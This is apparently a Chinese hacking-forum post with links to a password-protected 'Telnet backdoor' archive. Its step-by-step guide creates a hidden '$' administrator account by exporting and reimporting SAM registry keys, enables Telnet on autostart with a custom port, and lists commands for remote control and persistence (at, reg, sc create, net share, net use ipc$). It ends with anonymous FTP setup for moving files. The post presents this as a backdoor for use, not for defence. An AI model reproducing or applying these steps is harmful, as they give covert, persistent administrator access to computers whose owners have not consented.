半自动生成Telnet后门.rar(解压密码是:dianyancao@126.com)
http://www.nohack.cn/bbs/attachment.php?aid=MjE5MDN8MWMzYWU4ZTB8MTI2MDU5MDA1N3wxOWI1TmhoYW5NNUxDb3JsS014K2xHdjJOWno0Q250NmRoMDB2SUZCblYwdXc3Zw%3D%3D
组件文件.rar (解压密码是:dianyancao@126.com)
http://www.nohack.cn/bbs/viewthread.php?tid=111695&extra=
首先新建一个隐藏用户 $
具体操作:
新建用户 $ ,设置属性(用户不能更改密码)(密码永不到期)
并且为该用户设置较长的密码
打开用户 $ 的 属性的隶属于项
接着删除其中的Users组
并且把用户 $ 加入 Administrators组
在注册表中把 HKEY_LOCAL_MACHINE\SAM\SAM项的权限设置为
允许Administrators组完全控制,然后刷新该项
进入项 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$
找到用户 $ 的 默认值类型,记住该类型(0x???),并导出 $ 项为 "用户标识符.reg"
再进入项 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 之中
寻找和上面的类型相匹配的项,并将其导出为 "用户信息.reg"
最后在计算机用户管理中,删除用户 $ ,并导入上述两个注册表文件
再将用户 $ 加入 TelnetClients用户组
在计算机用户组管理中新建 TelnetClients 组
然后将用户 $ 添加成为 TelnetClients用户组 的成员
配置Telnet服务
在计算机服务管理中,启用Telnet服务,并将其 启动类型 设置为 自动
运行cmd.exe,开始命令行操作,输入命令:
tlntadmn config port= ???? &echo “????”是小于1024的正整数
测试Telnet服务
开始命令行操作,输入命令:
telnet 127.0.0.1 ???? &echo “????”是上面设置的Telnet服务端口
由于测试的是本机的Telnet,所以输入上述命令后有显示:
您将要把您的密码信息送到 Internet 区内的一台远程计算机上。这可能不安全。您还要送
吗(y/n):n
选择N,然后显示
Welcome to Microsoft Telnet Service
login: $
password:
输入用户名和密码,确定
若出现欢迎信息:Welcome to Microsoft Telnet Server.
那么就可以在网络上,用用户 $ 和密码,远程登录该计算机了。
使用Telnet进行远程控制
远程登录计算机控制台后,就可以用命令行操作运行程序了,使用方法和本地cmd相同。
推荐本地使用的命令:
ftp -? &echo 使用ftp命令需要远程系统添加Windows组件,即Internet 信息服务(IIS)
Transfers files to and from a computer running an FTP server service
(sometimes called a daemon). Ftp can be used interactively.
FTP [-v] [-d] [-i] [-n] [-g] [-s:filename] [-a] [-w:windowsize] [-A] [host]
-v Suppresses display of remote server responses.
-n Suppresses auto-login upon initial connection.
-i Turns off interactive prompting during multiple file
transfers.
-d Enables debugging.
-g Disables filename globbing (see GLOB command).
-s:filename Specifies a text file containing FTP commands; the
commands will automatically run after FTP starts.
-a Use any local interface when binding data connection.
-A login as anonymous.
-w:buffersize Overrides the default transfer buffer size of 4096.
host Specifies the host name or IP address of the remote
host to connect to.
Notes:
- mget and mput commands take y/n/q for yes/no/quit.
- Use Control-C to abort commands.
ftp -a 127.0.0.1
ftp> help
Commands may be abbreviated. Commands are:
! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary glob mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir
C:\>net use /?
此命令的语法是:
NET USE
[devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[/USER:[dotted domain name\]username]
[/USER:[username@dotted domain name]
[/SMARTCARD]
[/SAVECRED]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE {devicename | *} [password | *] /HOME
NET USE [/PERSISTENT:{YES | NO}]
示例:net use z: \\127.0.0.1\ipc$
推荐远程控制台的使用命令:
at /? &echo 用于在指定时间运行程序
reg /? &echo 用于修改注册表
attrib /? &echo 用于修改文件属性(隐藏,系统,只读)
net share /? &echo 用于开启共享
start /? &echo 用于立即执行指定程序
sc create /? &echo 用于生成服务
sc delete /? &echo 用于删除服务
sc query state= all >>c:\ServicesList.txt &echo 会生成所有服务详细信息到文本文件
shutdown -? &echo 用于关机,注销,重启
net start dot3svc &netsh lan reconnect interface="本地连接" &echo 重新启动“本地连接”
netsh interface ip set address "本地连接" static 192.168.1.24 255.255.255.0 192.168.1.1 1 &echo 修改本地连接的IP地址
附:(Internet 信息服务 IIS的添加)
打开§控制面板§,执行§添加删除程序§,点击§添加/删除Windows组件§,弹出§Windows 组件向导§
点击§Internet 信息服务(IIS)§,再点击§详细信息(D)...§,勾选§文件传输协议(FTP)服务§
系统将自动选择§Internet 信息服务管理单元§,§公用文件§和§文件传输协议(FTP)服务§,
如果需要§万维网服务§,也可选择上勾。选择完毕,单击确定,进行下一步,系统开始执行安装。
安装过程需要插入 XP系统的安装光盘,以便复制I386文件夹中的数据,当然也可以使用下面上传的§组件文件.RAR§
组件安装完成后,开始配置§Internet 信息服务§。
运行c:\windows\system32\inetsrv\iis.msc,打开Internet 信息服务
进入(本地计算机)的树形结构,进入§FTP 站点§,选择§默认 FTP 站点§的属性,开始设置。
点击§安全账户§,推荐选择只允许匿名连接(L),点击§主目录§,设置§本地路径§为你要共享的文件夹,拒绝写入,
即不勾选§写入(W)§,到此设置完毕,已经可以通过网址: ftp://127.0.0.1/,访问共享目录了。